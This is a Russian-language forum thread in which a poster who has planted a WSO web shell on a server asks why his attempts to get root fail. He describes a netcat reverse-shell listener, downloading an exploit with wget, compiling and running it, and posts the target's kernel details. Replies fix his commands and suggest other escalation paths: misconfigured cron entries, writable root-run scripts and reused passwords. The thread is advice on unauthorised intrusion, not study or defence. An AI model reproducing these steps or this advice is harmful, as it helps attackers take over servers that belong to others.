![]() |
[Проблема при получении рута сервера!]
Привет всем.
Пишу уже вторую подобную тему на этом форуме... Проблема заключается в том что я не могу получить права рута на сервере. Юзаю разные эксплоиты но в итоге получаю различные ошибки при исполнении эксплоита, преимущественно такую "Permission denied" Также при подключении через бэк-коннект к netcat появляется сообщение: "sh: no job control in this shell" Очень хотел бы разобраться и выяснить что же я делаю не так, для этого полностью опишу последовательность выполняемых мною действий: 1. Захожу в netcat и открываю порт на прослушку, вот такой командой: -l -p 7878 2. Далее захожу в шелл (использую WSO) и выбираю бэк-конект на свою машину (на порт который открыл на прослушку в netcat'е) 3. Получаю эксплоит из веба (командой wget http://site.ru/exploit.tar), либо сохраняю в файл на своем компьютере с расширением "c", а потом загружаю его на целевой сервер посредством шелла. 4. Если сплоит в единственном файле на "с" то последовательность моих команд из-под netcat'а следующая: gcc exploit.c -o exploit chmod -x exploit ./exploit 5. Если сплоит не один и лежит в архиве тогда делаю так: tar exploit.tar cd exploit ./run.sh Вот собственно и все хотелось бы услышать дельный совет в чем может быть моя ошибка, сразу оговорюсь что это уже второй шелл с данной проблемой, еще ни одного рута я получить не смог. P.S. id uid=48(apache) gid=48(apache) groups=48(apache) uname -a Linux 159794-app1.***.org 2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31 11:01:10 E DT 2009 i686 i686 i386 GNU/Linux |
Цитата:
Цитата:
ну во-первых можно и без chmod, если скомпилил из сорцов, и вобще-то надо chmod +x exploit а во вторых - ищи другой сплойт) |
Цитата:
Цитата:
Цитата:
Посоветуй что нибудь, хотябы где искать, milw0rm.com я уже облазил ничего не нашел подходящего, также искал через exploitsearch.com, тоже никакого результата. |
ядро патченое, ищи другие пути получения рута
|
Цитата:
|
overxor хотел сказать, что нужно поискать эксплоиты не под ядро, а под конкретные операционные системы и их сервисы.
|
Да Ins3t прав. Смотри права на системные файлы (к примеру /etc/crontab. Если есть не стандартные записи следуй по ним. Часто бывает что на сами исполняемые скрипты стоят не правильные права) . Пробуй одинаковые пароли. Ищи самописные сервисы, скрипты исполняемые с наивысшими правами.
|
| Время: 00:03 |